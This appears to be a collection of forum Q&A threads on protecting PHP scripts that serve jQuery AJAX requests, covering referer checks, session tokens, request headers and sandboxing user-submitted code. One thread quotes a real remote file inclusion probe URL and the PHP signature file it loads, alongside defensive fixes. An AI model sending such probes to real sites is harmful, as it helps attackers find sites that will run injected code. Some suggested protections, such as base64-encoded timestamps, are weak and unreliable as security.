How to secure sensitive PHP files that process jQuery data?

On my website, I have a search.php page that makes $.get requests to pages like search_data.php and search_user_data.php etc.
The problem is all of these files are located within my public html folder.
Someone could browse directly to www.mysite.com/search_user_data.php. All of the data it processes is properly escaped and handled, but on a professional level it is still inadequate to have this file within public reach.
I have tried moving the sensitive files above my web root, but since jQuery makes $.get requests and passes variables in the URL, that doesn't work.
Does anyone know any methods to firmly secure these vulnerable pages?

What you describe is normal.
You have PHP files that are reachable in your www directory so Apache (or whichever web server you use) can read and process them.
If you move them out of it, you can't reach them anymore, so that is not really an option.
After all, your PHP files for AJAX are just regular PHP files; the rest of your project presumably contains PHP files too, right? They are no more or less at risk than any other script on your server.
Make sure you program "clean": think about evil requests while writing your PHP functions, not after writing them.
As you already did: correctly quote all incoming input that might hit a database or sensitive function.
You can add security checks on your incoming values and create an automated email if you detect someone trying evil stuff. So you'll likely receive a warning in such cases.
But on the downside: you'll regularly receive warnings anyway, because some companies automatically scan websites for possible bugs, and such scans will trigger your alerts too.
On top of writing your code as "secure" as you can, you may want to add a referer check. That means your PHP file will only respond if your website was given as the referer when accessing it. That's enough to block 80% of the kids out there.
But on the downside: a few internet users do not send a referer at all, and some proxies filter it out. (I would personally ignore those users; half the web breaks for them anyway.)
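A minimal sketch of such a referer check (the host name comes from the question; everything else is an assumption, and remember the header can be spoofed or missing):

<?php
// Reject requests whose Referer does not point at our own site.
// Note: PHP spells the key HTTP_REFERER (one R); this is a speed bump, not real security.
$referer = $_SERVER['HTTP_REFERER'] ?? '';
if (parse_url($referer, PHP_URL_HOST) !== 'www.mysite.com') {
    header('HTTP/1.1 403 Forbidden');
    exit('Direct access not allowed.');
}
// ... continue with the normal search_user_data.php logic ...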
One more layer of protection can be added via .htaccess; you can do most of this within PHP, but it might still be of interest for you: http://httpd.apache.org/docs/2.0/howto/htaccess.html

You can generate a uid each time your page is loaded and store it in $_SESSION['uid']. You hand this uid to JavaScript like this:
var uid = <?php print $_SESSION['uid']; ?>;
Then you pass it along with your GET request and compare it to the value in $_SESSION:
if($_GET['uid'] != $_SESSION['uid']) // Stop with an error message or send a forbidden header.
If it's ok, do what you need.
It's not perfect since someone can request search.php and get the current uid, and then request the other pages, but it may be the best possible solution.
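A rough end-to-end sketch of that idea (the file names follow the question; the token generation and PHP 7+ random_bytes() are assumptions):

<?php
// search.php: create a per-session token and expose it to the page's JavaScript.
session_start();
if (empty($_SESSION['uid'])) {
    $_SESSION['uid'] = bin2hex(random_bytes(16));
}
?>
<script>
var uid = <?php echo json_encode($_SESSION['uid']); ?>;
$.get('search_user_data.php', { uid: uid, q: 'term' }, function (data) {
    // handle the response
});
</script>

<?php
// search_user_data.php: refuse requests that do not carry the session token.
session_start();
if (empty($_SESSION['uid']) || ($_GET['uid'] ?? '') !== $_SESSION['uid']) {
    header('HTTP/1.1 403 Forbidden');
    exit;
}
// ... run the actual search and echo the result ...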

Related

Ajax verify page before executing

I have an ajax.php file to which all of my ajax calls point with an extra parameter of the script the current call demands to execute. My problem is that I want to limit some scripts to being executed by specific pages only, say for example sendComment.php should only be called from www.mysite.com/user/{any user}.
What I have done is put this code on top of every script that I want to limit:
if (strstr($_SERVER['HTTP_REFERER'], 'mysite.com/{page_allowed_to_exec_script}')) {
    // Then do stuff here
}
But what I've come to notice is that not all browsers send the HTTP_REFERRER header (I might have spelled that incorrectly, I'm writing this from memory). Besides not being cross-browser, it's also a pain in the butt having to hardcode this check in all of the files, and it will be an even bigger pain when it comes to changing things. I'm looking for a way to keep all the scripts in an array together with the pages that are allowed to execute them, and perform the check in the ajax.php file at the start.
Does anyone have any idea how this can be achieved?
Even browsers that normally send the "referer" header may not: a proxy, firewall, or "security" suite can strip it out or even change it. So you can't trust it.
If you control the referring page you can use sessions, cookies or the URL to pass the information if you feel it's that vital. If it's absolutely vital, your only option is sessions. The other two can easily be removed.
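A sketch of the array-based check the question asks for, placed at the top of ajax.php (the script names, page paths, and the 'script' parameter are only examples; per the answer above, a session value would be more reliable than the referer):

<?php
// ajax.php: map each callable script to the page paths that may trigger it.
$whitelist = array(
    'sendComment.php' => array('/user/'),
    'getResults.php'  => array('/search/', '/user/'),
);

$script  = basename($_GET['script'] ?? '');
$referer = (string) parse_url($_SERVER['HTTP_REFERER'] ?? '', PHP_URL_PATH);

$allowed = false;
foreach ($whitelist[$script] ?? array() as $prefix) {
    if (strpos($referer, $prefix) === 0) {
        $allowed = true;
        break;
    }
}

if (!$allowed) {
    header('HTTP/1.1 403 Forbidden');
    exit;
}

require __DIR__ . '/scripts/' . $script;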

how to prevent 'manual execution' of external PHP script

In simplest terms, I utilize external PHP scripts throughout my client's website for various purposes such as getting search results, updating content, etc.
I keep these scripts in a directory:
www.domain.com/scripts/scriptname01.php
www.domain.com/scripts/scriptname02.php
www.domain.com/scripts/scriptname03.php
etc..
I usually execute them using jQuery AJAX calls.
What I'm trying to do is find a piece of code that will detect (from within) whether these scripts are being executed via AJAX or MANUALLY via the URL by the user.
IS THIS POSSIBLE??
I have searched absolutely everywhere and tried various methods involving the $_SERVER[] array, but still no success.
What I'm trying to do is find a piece of code that will detect (from within) whether these scripts are being executed via AJAX or MANUALLY via the URL by the user.
IS THIS POSSIBLE??
No, not with 100% reliability. There's nothing you can do to stop the client from simulating an Ajax call.
There are some headers you can test for, though, namely X-Requested-With. They would prevent an unsophisticated user from calling your Ajax URLs directly. See Detect Ajax calling URL
Most AJAX frameworks will send an X-Requested-With: header. Assuming you are running on Apache, you can use the apache_request_headers() function to retrieve the headers and check for it/parse it.
Even so, there is nothing preventing someone from manually setting this header - there is no real 100% foolproof way to detect this, but checking for this header is probably about as close as you will get.
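A minimal sketch of that header check; apache_request_headers() is Apache-specific, so the $_SERVER fallback (which works on other servers too) is included, and remember the header can be faked:

<?php
// Reject requests that do not carry the header jQuery adds to its AJAX calls.
$headers = function_exists('apache_request_headers') ? apache_request_headers() : array();
$xrw = $headers['X-Requested-With'] ?? $_SERVER['HTTP_X_REQUESTED_WITH'] ?? '';

if (strcasecmp($xrw, 'XMLHttpRequest') !== 0) {
    header('HTTP/1.1 403 Forbidden');
    exit('AJAX requests only.');
}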
Depending on what you need to protect and why, you might consider requiring some form of authentication, and/or using a unique hash/PHP sessions, but this can still be reverse engineered by anyone who knows a bit about Javascript.
As an idea of things that you can verify: if you check all of these before servicing your request, it will afford a degree of certainty (although not much, and none if someone is deliberately trying to circumvent your system); a combined sketch follows the list:
Store a unique hash in a session value, and require it to be sent back to you by the AJAX call (in a cookie or a request parameter) so you can compare the two on the server side and verify that they match
Check the X-Requested-With: header is set and the value is sensible
Check that the User-Agent: header is the same as the one that started the session
The more things you check, the more chance an attacker will get bored and give up before they get it right. Equally, the longer/more system resources it will take to service each request...
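A hedged sketch of those three checks combined (the 'token' parameter and the session keys are assumptions; the page that starts the session would need to set $_SESSION['ajax_token'] and $_SESSION['user_agent'] first):

<?php
session_start();

// 1. Unique hash stored in the session, echoed back by the AJAX call.
$tokenOk = isset($_SESSION['ajax_token'], $_REQUEST['token'])
    && hash_equals($_SESSION['ajax_token'], $_REQUEST['token']);

// 2. X-Requested-With header is set and sensible.
$headerOk = strcasecmp($_SERVER['HTTP_X_REQUESTED_WITH'] ?? '', 'XMLHttpRequest') === 0;

// 3. User-Agent matches the one recorded when the session started.
$agentOk = ($_SERVER['HTTP_USER_AGENT'] ?? '') === ($_SESSION['user_agent'] ?? '');

if (!$tokenOk || !$headerOk || !$agentOk) {
    header('HTTP/1.1 403 Forbidden');
    exit;
}
// ... service the request ...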
There is no 100% reliable way to prevent a user, if he knows the address of your request, from invoking your script.
This is why you have to authenticate every request to your script. If your script is only to be called by authenticated users, check for the authentication again in your script. Treat it as you would treat incoming user input - validate and sanitize everything.
On Edit: The same could be said for any script which the user can access through the URL. For example, consider profile.php?userid=3
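For the profile.php?userid=3 example, that re-check might look roughly like this (the session keys are assumptions):

<?php
// profile.php: never trust the userid in the URL by itself; re-check the
// authenticated session on every request, AJAX or not.
session_start();

$requestedId = (int) ($_GET['userid'] ?? 0);

if (empty($_SESSION['user_id'])) {
    header('HTTP/1.1 401 Unauthorized');
    exit;
}

// Only let users load their own profile unless they are an admin.
if ($requestedId !== (int) $_SESSION['user_id'] && empty($_SESSION['is_admin'])) {
    header('HTTP/1.1 403 Forbidden');
    exit;
}
// ... load and output the profile ...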

Best way to allow user to inject and run php code

I've been thinking for a while about the idea of allowing user to inject code on website and run it on a web server. It's not a new idea - many websites allow users to "test" their code online - such as http://ideone.com/.
For example: let's say that we have a form containing a <textarea> element in which the user enters his piece of code and then submits it. The server reads the POST data, saves it as a PHP file and require()s it, surrounded by ob_*() output buffering handlers. The captured output is presented to the end user.
My question is: how to do it properly? Things that we should take into account [and possible solutions]:
security: the user is not allowed to do anything evil [possible solution: php.ini's disable_functions]
stability: the user is not allowed to kill the web server by submitting while(true){} [possible solution: set_time_limit()]
performance: the server returns an answer in an acceptable time
control: the user can do anything that matches the previous points
I would prefer PHP-oriented answers, but general approach is also welcome. Thank you in advance.
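For reference, the naive in-process version described above might look like this rough sketch (the file handling is an assumption; as the answers below argue, running this inside the web server process is risky):

<?php
// Very naive: save the submitted code and run it with output buffering.
// Note that set_time_limit() does not stop loops that sleep or wait on I/O,
// which is one reason to prefer a separate, killable worker process.
set_time_limit(5);

$file = tempnam(sys_get_temp_dir(), 'usercode_');
file_put_contents($file, $_POST['code'] ?? '');

ob_start();
require $file;
$output = ob_get_clean();
unlink($file);

echo htmlspecialchars($output);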
I would think about this problem one level higher, above and outside of the web server. Have a very unprivileged, jailed, chroot'ed standalone process for running these uploaded PHP scripts, then it doesn't matter what PHP functions are enabled or not, they will fail based on permissions and lack of access.
Have a parent process that monitors how long the above-mentioned "worker" process has been running; if it has been running too long, kill it and report a timeout error back to the end user.
Obviously there are many implementation details to work out as to how to run this system asynchronously outside of the browser request, but I think it would provide a pretty secure way to run your untrusted PHP scripts.
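A rough sketch of that parent/worker split using proc_open() (the restricted php.ini path and the 5-second limit are assumptions; the chroot jail and unprivileged user would be set up outside PHP, so this alone is not a hardened sandbox):

<?php
// Run the snippet in a separate PHP process loading a locked-down ini file,
// and kill the worker if it runs too long.
function run_untrusted($code, $timeoutSeconds = 5)
{
    $file = tempnam(sys_get_temp_dir(), 'snippet_');
    file_put_contents($file, $code);

    $cmd  = 'php -c /etc/php/restricted-php.ini ' . escapeshellarg($file);
    $proc = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $pipes);

    $start = time();
    while (($status = proc_get_status($proc)) && $status['running']) {
        if (time() - $start > $timeoutSeconds) {
            proc_terminate($proc, 9);          // worker ran too long
            break;
        }
        usleep(100000);                        // poll ten times per second
    }

    $output = stream_get_contents($pipes[1]);  // whatever the worker printed
    proc_close($proc);
    unlink($file);

    return $output;
}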
Wouldn't disabling functions in your server's ini file limit some of the functions of the application itself?
I think you have to do some hardcore sanitization on the POST data and strip "illegal" code there. Doing that in addition to the other methods you describe might make it work.
Just remember. Sanitize the everloving daylight out of that POST data.

What bug does this hacker want to exploit?

A guy called ShiroHige is trying to hack my website.
He tries to open a page with this parameter:
mysite/dir/nalog.php?path=http://smash2.fileave.com/zfxid1.txt???
If you look at that text file it is just a die(),
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
So what exploit is he trying to use (WordPress?)?
Edit 1:
I know he is trying to use RFI.
Is there some popular script that is exploitable that way (Drupal, phpBB, etc.)?
An obvious one, just unsanitized include.
He is checking if the code gets executed.
If he finds his signature in a response, he will know that your site is ready to run whatever code he sends.
To prevent such attacks one has to strictly sanitize filenames if they happen to be sent via HTTP requests.
A quick and cheap validation can be done using the basename() function:
$modules_dir = __DIR__ . '/modules/';   // the directory that holds the includable pages

if (empty($_GET['page'])) {
    $_GET['page'] = "index";
}

// basename() strips any directory or URL part, so "../../etc/passwd" or a
// remote URL collapses to a bare filename inside $modules_dir.
$page = $modules_dir . basename($_GET['page']) . ".php";

if (!is_readable($page)) {
    header("HTTP/1.0 404 Not Found");
    $page = "404.html";
}
include $page;
or using some regular expression.
There is also an extremely useful PHP configuration directive called
allow_url_include
which is set to off by default in modern PHP versions. So it protects you from such attacks automatically.
The vulnerability the attacker is aiming for is probably some kind of remote file inclusion, exploiting PHP's include and similar functions/constructs that allow loading a (remote) file and executing its contents:
Security warning
Remote file may be processed at the remote server (depending on the file extension and the fact if the remote server runs PHP or not) but it still has to produce a valid PHP script because it will be processed at the local server. If the file from the remote server should be processed there and outputted only, readfile() is much better function to use. Otherwise, special care should be taken to secure the remote script to produce a valid and desired code.
Note that using readfile() only avoids executing the loaded file. It is still possible to exploit it to load other content that is then printed directly to the user. This can be used to print the plain contents of files of any type on the local file system (i.e. Path Traversal) or to inject code into the page (i.e. Code Injection). So the only protection is to validate the parameter value before using it.
See also OWASP’s Development Guide on “File System – Includes and Remote files” for further information.
It looks like the attack is designed to print out "ShiroHige" on vulnerable sites.
The idea being that if you use include but do not sanitize your input, then the PHP in this text file is executed. If this works, he can send any PHP code to your site and execute it.
A list of similar files can be found here. http://tools.sucuri.net/?page=tools&title=blacklist&detail=072904895d17e2c6c55c4783df7cb4db
He's trying to get your site to run his file. This would probably be an XSS attack? Not quite familiar with the terms (Edit: RFI - Remote file inclusion).
Odds are he doesn't know what he's doing. If there were a way to get into WordPress, it would be very public by now.
I think it's only a first test of whether your site is vulnerable to external includes. If the echo is printed, he knows it's possible to inject code.
You're not giving much detail on the situation and leaving a lot to the imagination.
My guess is that he's trying to exploit allow_url_fopen. And right now he's just testing code to see what he can do. This is the first wave!
I think it is just a malicious URL. As soon as I entered it into my browser, Avast antivirus flagged it as malicious. So that PHP code may be deceiving, or he may just be testing. Another possibility is that the hacker has no bad intentions and just wants to show that he could get past your security.

How to deny direct access to files in AJAX directory

I have several pages that call in content via jQuery .ajax. I don't want the content visible on the page, so that's why I went with .ajax rather than showing/hiding the content. I want to protect the files inside the AJAX directory from being directly accessible through the browser URL. I know that PHP headers can be spoofed, and I don't know whether it is better to use an "access" key or to try doing it via htaccess.
My question is: which is the more reliable method? There is no logged-in/non-logged-in user status, and the main pages need to be able to pull in content from the pages in the AJAX directories.
thx
Make a temporary time-coded session variable. Check the variable in the PHP output file before echoing the data.
OR, if you don't want to use sessions.. do this:
$key = base64_encode(time().'abcd');
In the file that is read:
base64_decode() the key,
explode() it by 'abcd',
and read the time. Allow a 5-second buffer: if the time falls within 5 seconds of the stamped request, you are legit.
To make it more secure, you can change your encrypting / decrypting mechanism.
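A rough sketch of that mechanism as described (the 'abcd' separator and the 5-second window come from the answer; note that base64 is encoding rather than encryption, so this mainly deters casual direct access):

<?php
// On the page that makes the AJAX call: stamp a key with the current time
// and pass it along with the request, e.g. ?key=...
$key = base64_encode(time() . 'abcd');

<?php
// In the AJAX content file: only answer if the stamp is fresh.
$parts = explode('abcd', base64_decode($_GET['key'] ?? ''));
$stamp = (int) ($parts[0] ?? 0);

if (abs(time() - $stamp) > 5) {      // allow a 5-second buffer
    header('HTTP/1.1 403 Forbidden');
    exit;
}
// ... echo the protected content ...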
I would drop this idea because there is no secure way to do it.
Your server will never be able to tell a "real" Ajax request apart from a "faked" one, as every aspect of the request can be forged on the client side. An attacker just has to watch a packet sniffer (or the browser's network tools) to see what requests your page makes; replicating them is trivial.
Any solution you work out will do nothing but provide a false sense of security. If you have data you need to keep secret, you will need to employ some more effective protection such as authentication.
Why not keep the content outside the web server's document root, and have a PHP script that validates whether the person should see it and then sends it to them?
So you have getcontent.php, which looks at a cookie, or at a token that was given to the JavaScript page and passed along with the request; it then fetches the real content, sets the MIME type, and streams it to the user.
This way you can change your logic as to who should have access, without changing any of the rest of your application.
To the browser there is no real difference between http://someorg.net/myimage.gif and http://someorg.net/myscript.php?token=887799&img_id=ddtw88, but obviously it has to work over GET, so a time-limited value is necessary since the user can see and reuse it.
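A minimal sketch of such a getcontent.php (the storage path, token handling, and id whitelisting are assumptions):

<?php
// getcontent.php: validate a session token, then stream a file that lives
// outside the web root so it can never be fetched directly by URL.
session_start();

$token = $_GET['token'] ?? '';
if (empty($_SESSION['ajax_token']) || !hash_equals($_SESSION['ajax_token'], $token)) {
    header('HTTP/1.1 403 Forbidden');
    exit;
}

// Whitelist the id so it can only map to files we intend to serve.
$id   = preg_replace('/[^a-z0-9_]/i', '', $_GET['img_id'] ?? '');
$file = '/var/www/private_content/' . $id . '.html';   // outside the document root

if (!is_readable($file)) {
    header('HTTP/1.0 404 Not Found');
    exit;
}

header('Content-Type: text/html; charset=utf-8');
readfile($file);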
